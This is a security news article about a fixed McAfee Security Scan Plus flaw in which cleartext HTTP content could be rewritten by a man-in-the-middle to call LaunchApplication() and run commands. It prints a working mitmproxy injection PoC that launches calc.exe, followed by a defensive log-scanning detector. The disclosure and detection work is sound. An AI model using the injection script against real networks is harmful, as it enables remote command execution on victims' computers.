McAfee Security Scan Plus: On this site you have read many times about security companies' negligence. Now it is McAfee's turn. The company is reported to have fixed a flaw in its free Security Scan Plus tool, which fetched content onto users' computers over plain HTTP, that is, unencrypted and in clear text.
The company seems to have forgotten what it preaches, or assumed that nobody would think of man-in-the-middle attacks against its services: the free online scan itself, but also the in-app advertisements and the UI that displays them.
The vulnerability was discovered by SecuriTeam, which states that the McAfee tool "retrieves information from different mcafee.com domains and displays it to the user, usually in the main application window".
Because HTTPS is not used to transfer this information, an attacker on the network path can modify it and then abuse the library the tool uses to render it (MCBRWSR2.DLL) to display any HTML content they wish.
That library exposes a JavaScript API, LaunchApplication(), to the rendered content, which simply means the attacker can execute any command they want on the victim's machine.
After each scan, McAfee Security Scan Plus displays a UI showing the target's "level of protection", loaded from the following URL:
http://home.mcafee.com/SecurityScanner/SSBanner.aspx
This information is displayed while the online scan is in progress, so the user can easily believe the computer is clean when in fact it has just been compromised.
Put yourself in the attacker's shoes: with a MITM position it is quite easy to run commands with the privileges of the logged-in user, which in many cases is an administrator account.
The full PoC needs only 38 lines of code. McAfee acknowledged the issue and repaired the service in July.
The PoC code (a mitmproxy inline script):
```python
#!/usr/bin/env python3
#
# HTTP proxy mode:
#   mitmproxy -s mcsploit_inline.py --ignore '.*'
#
# Transparent proxy mode:
#   mitmproxy -s mcsploit_inline.py -T
#
# Inline script for mitmproxy 2.x/3.x (it uses http.HTTPResponse.make, which
# later mitmproxy releases renamed to http.Response.make).
from mitmproxy import ctx, http
import requests

# Command to launch on the victim through window.external.LaunchApplication().
# Backslashes are doubled twice so they survive both the Python string and the
# JavaScript string literal the command is embedded in.
COMMAND = "c:\\\\windows\\\\system32\\\\calc.exe"
CMDARGS = ""

# JavaScript payload: the McAfee UI (MCBRWSR2.DLL) exposes LaunchApplication()
# to page scripts; the try/catch keeps the page working in an ordinary browser.
INJECT = ("try{window.external.LaunchApplication(\"%s\",\"%s\");}"
          "catch(launchapperr){var x;}" % (COMMAND, CMDARGS))


def response(flow):
    # Only touch cleartext requests to McAfee hosts; HTTPS traffic is left alone.
    if flow.request.scheme != "http":
        return
    if not (flow.request.headers["host"].endswith("mcafee.com")
            or "mcafee" in flow.request.url):
        return

    if flow.response.status_code == 302:
        # The HTTP endpoint redirects to HTTPS: fetch the real page ourselves
        # and serve a modified copy with status 200 so the redirect never happens.
        ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (HTML)")
        https_url = flow.request.url.replace("http://", "https://")
        r = requests.get(https_url, headers=flow.request.headers, verify=False)
        if "text/html" not in r.headers["content-type"]:
            return
        # The HTML markup of this replace was lost when the page was extracted;
        # it is reconstructed here with the same payload the JS branch injects.
        contents = r.text.replace("<head>", "<head><script>%s</script>" % INJECT)
        flow.response = http.HTTPResponse.make(
            200,
            bytes(contents, encoding="utf-8"),
            {"Content-Type": "text/html; charset=utf-8", "Expires": "-1"},
        )
        return

    try:
        if flow.response.headers["content-type"] == "text/javascript":
            ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (JS)")
            try:
                # Prepend the payload to the script the UI is about to execute.
                flow.response.text = INJECT + "\n" + flow.response.text
            except (AttributeError, TypeError):
                ctx.log("[-] [MCSPLOIT] No content in the original response!")
    except KeyError:
        # Response without a Content-Type header: nothing to inject into.
        pass
```
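The PoC above is the attacker's side. The check a defender would want is the mirror image: find out whether any client on the network is still fetching mcafee.com content over cleartext HTTP, and whether any fetched body carries the LaunchApplication() call the PoC injects. The following is an added example written for this page; it is not SecuriTeam's PoC and not McAfee's code. The log lines are constructed in Squid's native access.log layout (timestamp, elapsed, client, action/status, bytes, method, URL, ident, hierarchy, type), the second URL path is an assumption, and the host test deliberately matches on the hostname suffix rather than on a substring of the whole URL, which is the weakness of the PoC's own `"mcafee" in flow.request.url` test.

```python
import re
from typing import List, Tuple
from urllib.parse import urlparse

MCAFEE_DOMAIN = "mcafee.com"


def is_cleartext_mcafee_request(url: str) -> bool:
    """True when url is a plain-HTTP fetch of a mcafee.com host.

    The match is on the parsed hostname (exact or as a subdomain), so
    'http://lookalike.example/mcafee/update' and 'http://notmcafee.com/'
    are not flagged, and any https:// URL is ignored.
    """
    parts = urlparse(url)
    if parts.scheme.lower() != "http" or not parts.hostname:
        return False
    host = parts.hostname.lower()
    return host == MCAFEE_DOMAIN or host.endswith("." + MCAFEE_DOMAIN)


# The API the PoC abuses; look for it in any HTML/JS body the UI fetched.
LAUNCH_RE = re.compile(r"window\.external\.LaunchApplication\s*\(", re.IGNORECASE)


def body_has_launch_call(body: str) -> bool:
    """True when a fetched HTML/JS body contains a LaunchApplication() call."""
    return LAUNCH_RE.search(body) is not None


# Constructed sample log (not real traffic). Only the first two GETs are
# cleartext fetches of a mcafee.com host; the CONNECT is a TLS tunnel and the
# last line is a look-alike host with 'mcafee' in its path.
SAMPLE_LOG = """\
1499000001.123    45 10.0.0.5 TCP_MISS/302 512 GET http://home.mcafee.com/SecurityScanner/SSBanner.aspx - HIER_DIRECT/1.2.3.4 text/html
1499000002.456   120 10.0.0.5 TCP_MISS/200 8012 GET http://home.mcafee.com/SecurityScanner/ui.js - HIER_DIRECT/1.2.3.4 text/javascript
1499000003.789    30 10.0.0.7 TCP_MISS/200 1024 GET http://example.org/index.html - HIER_DIRECT/5.6.7.8 text/html
1499000004.012    60 10.0.0.7 TCP_TUNNEL/200 4096 CONNECT home.mcafee.com:443 - HIER_DIRECT/1.2.3.4 -
1499000005.345    33 10.0.0.9 TCP_MISS/200 700 GET http://lookalike.example/mcafee/update - HIER_DIRECT/9.9.9.9 text/html
"""


def find_cleartext_mcafee_fetches(log_text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, url) for every cleartext mcafee.com fetch in a Squid log."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # malformed or truncated line
        client, method, url = fields[2], fields[5], fields[6]
        if method == "CONNECT":
            continue  # TLS tunnel: the content is encrypted, not our indicator
        if is_cleartext_mcafee_request(url):
            hits.append((client, url))
    return hits


if __name__ == "__main__":
    for client, url in find_cleartext_mcafee_fetches(SAMPLE_LOG):
        print("cleartext McAfee fetch from %s: %s" % (client, url))
    sample_body = 'try{window.external.LaunchApplication("c:\\\\windows\\\\system32\\\\calc.exe","");}catch(e){}'
    print("payload present:", body_has_launch_call(sample_body))
```

Run against a real proxy log, every hit is a client whose scanner UI is exposed to exactly the rewrite the PoC performs; after McAfee's July fix the same query should return nothing but CONNECT tunnels.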